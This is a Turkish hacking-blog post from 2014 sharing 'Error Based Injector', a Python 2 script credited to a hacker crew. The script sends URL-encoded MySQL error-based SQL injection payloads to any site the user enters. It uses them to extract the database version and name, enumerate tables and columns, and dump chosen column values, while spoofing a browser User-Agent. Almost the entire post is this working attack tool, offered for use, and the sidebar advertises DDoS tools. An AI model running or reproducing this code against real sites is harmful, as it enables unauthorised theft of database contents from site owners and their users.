Error Based Enjector .Py Derleme

Eylül 28, 2014

Error Based Enjector .Py Derleme

Selam Arkadaşlar UnderGrand Tec. Ekibi Olarak Error Based Derlemesini Sunuyorum.

Pythonda Kodlanmıştır

Devil~hector~Tr4 e Teşşekürler.

# -*- coding: cp1254 -*-
import urllib2
import re

version = "%20or%201%20group%20by%20concat_ws%280x7e7e7e7e,0x3a,version%28%29,0x7e7e7e7e,floor%28rand%280%29*2%29%29%20having%20min%280%29%20or%201--"
dbase = "%20and%20%28select%201%20from%20%28select%20count%28%2a%29%2Cconcat%28%28select%28select%20concat%28cast%28database%28%29%20as%20char%29%2C0x7e%29%29%20from%20information_schema.tables%20where%20table_schema%3Ddatabase%28%29%20limit%200%2C1%29%2Cfloor%28rand%280%29%2a2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29"
tablo1 = "%20and%20%28select%201%20from%20%28select%20count%28%2a%29%2Cconcat%28%28select%28select%20concat%28cast%28table_name%20as%20char%29%2C0x7e%29%29%20from%20information_schema.tables%20where%20table_schema%3Ddatabase%28%29%20limit%20"
tablo2 = "%2C1%29%2Cfloor%28rand%280%29%2a2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29"
kolon1 = "%20and%20%28select%201%20from%20%28select%20count%28%2a%29%2Cconcat%28%28select%28select%20concat%28cast%28column_name%20as%20char%29%2C0x7e%29%29%20from%20information_schema.columns%20where%20table_name%3D0x"
kolon2 = "%20limit%20"
kolon3 = "%2C1%29%2Cfloor%28rand%280%29%2a2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29"
vericek1 = "%20and%20%28select%201%20from%20%28select%20count%28%2a%29%2Cconcat%28%28select%28select%20concat%28cast%28concat%280x212121%2C"
vericek2 = "%2C0x212121%29%20as%20char%29%2C0x7e%29%29%20from%20"
vericek3 = "%20limit%200%2C1%29%2Cfloor%28rand%280%29%2a2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29"
user_agent = user_agent = {'User-Agent':'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)'}


class cek:
    def __init__(self):
        print """
Coded By HaR@Be
Error Based İnjector v 1.0
"""
        self.site = raw_input("Site : ")
    def version(self):
        baglan = urllib2.Request(self.site+version,headers=user_agent)
        cek = urllib2.urlopen(baglan).read()
        if "~~~~" in cek:
            getir = re.findall("~~~~(.*?)~~~~",cek)
            print "Version : "+getir[0]

        else:
            print "Version Çekilemedi"

    def database(self):
        baglan1 = urllib2.Request(self.site+dbase,headers=user_agent)
        cek_database = urllib2.urlopen(baglan1).read()
        if "Duplicate" in cek_database:
            getir1 = re.findall("Duplicate entry '(.*?)' for",cek_database)
            self.database_ismi = getir1[0].replace("~1","")
            print "Database : "+self.database_ismi

        else:
            print "Database Çekilemedi"

    def tablo_cek(self):
        self.sitenin_tablolari = []
        durum = 1
        sayi = 0
        print "Tablolar"
        print "--------"
        while durum == 1:
            tabloaltakoy = tablo1+str(sayi)+tablo2
            baglan2 = urllib2.Request(self.site+tabloaltakoy,headers=user_agent)
            cek_tablolari = urllib2.urlopen(baglan2).read()
            if "Duplicate" in cek_tablolari:
                getir3 = re.findall("Duplicate entry '(.*?)' for",cek_tablolari)
                self.cek_tablo_ismi = getir3[0].replace("~1","")
                self.sitenin_tablolari.append(self.cek_tablo_ismi)
                print self.cek_tablo_ismi
            else:
                print "--------"
                durum = 0
            sayi = sayi + 1

    def kolon_cek(self):
        self.sitenin_kolonlari = []
        self.istenen_tablo = raw_input("Tablo Adini Girin : ")
        durum = 1
        sayi = 0
        print "Kolonlar"
        print "--------"
        while durum == 1:
            tablo1altakoy = kolon1+str(self.istenen_tablo.encode('hex'))+kolon2+str(sayi)+kolon3
            baglan3 = urllib2.Request(self.site+tablo1altakoy,headers=user_agent)
            cek_kolonlari = urllib2.urlopen(baglan3).read()
            if "Duplicate" in cek_kolonlari:
                getir4 = re.findall("Duplicate entry '(.*?)' for",cek_kolonlari)
                self.cek_kolon_ismi = getir4[0].replace("~1","")
                self.sitenin_kolonlari.append(self.cek_kolon_ismi)
                print self.cek_kolon_ismi
            else:
                print "########"
                durum = 0
            sayi = sayi + 1

    def veri_cek(self):
        istenen_kolon = raw_input("İstenen Kolon : ")
        sonsorgu = self.site+vericek1+istenen_kolon+vericek2+self.database_ismi+"."+self.istenen_tablo+vericek3
        baglanson = urllib2.Request(sonsorgu,headers=user_agent)
        soncek123 = urllib2.urlopen(baglanson).read()
        if "Duplicate" in soncek123:
            getirson = re.findall("'!!!(.*?)!!!",soncek123)
            print istenen_kolon+" = "+getirson[0]
            print "Sorgu : "+sonsorgu
        else:
            print "Veri Çekilemedi."
        
        
basla = cek()
basla.version()
basla.database()
basla.tablo_cek()
basla.kolon_cek()
basla.veri_cek()

Bu Blogda Ara

Error Based Enjector .Py Derleme

Yorumlar

Yorum Gönder

Popüler Yayınlar

En Güçlü DDos Araçları // Power DDos Attack Tool

Ip Nedİr? Ip Çeşitleri Nelerdir?